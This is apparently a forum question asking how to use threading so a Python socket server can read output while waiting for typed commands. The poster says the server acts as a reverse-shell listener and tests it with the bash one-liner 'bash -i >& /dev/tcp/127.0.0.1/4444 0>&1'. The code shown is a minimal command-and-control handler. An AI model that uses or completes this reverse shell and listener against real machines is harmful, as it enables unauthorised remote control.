# How can I use threading to prevent input() from waiting for recv socket data

Tags: python, multithreading, sockets, python-multithreading, python-sockets

I can send commands and receive the output,but send command two times is needed to receive the correct.
How to avoid this using threading or multithreading?
Tested with bash -i >& /dev/tcp/127.0.0.1/4444 0>&1 as client while the following server is running.

```
import socket
import threading

s = socket.socket()
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
s.bind(('127.0.0.1',4444))
s.listen(5)


def receive_and_print():

    response = clientsocket.recv(1024)
    print(response.decode('utf-8'))


def input_and_send_command():

    inp = input('$: ')
    command = inp + '\n'
    clientsocket.send(bytes(command,'utf-8'))


while True:

    clientsocket,addr = s.accept()
    print(f'connection from {addr} established')


    while True:

        receive_and_print()
        input_and_send_command()
```

Comment: The only way someone can possibly understand your question is by following the comments in [your other question](https://stackoverflow.com/q/68382250/238704).

Comment: That's true @PresidentJamesK.Polk first time I really don't know how to do it...feels like :(

Comment: I'm afraid even after reading the comments I'm not quite sure what you want to happen. Perhaps you can provide an example of what you want to achieve, then we can figure out how to do it.

Comment: I want to obtain the ouput of a reverse shell data, just like a netcat server tcp listener does, it's almost working but some program flow isn't doing the expected. I see questions hardest than mine, Im working always in localhost, nothing to be afraid about...just Im desperated by the way. I have a lot of work...and this is the soft part omg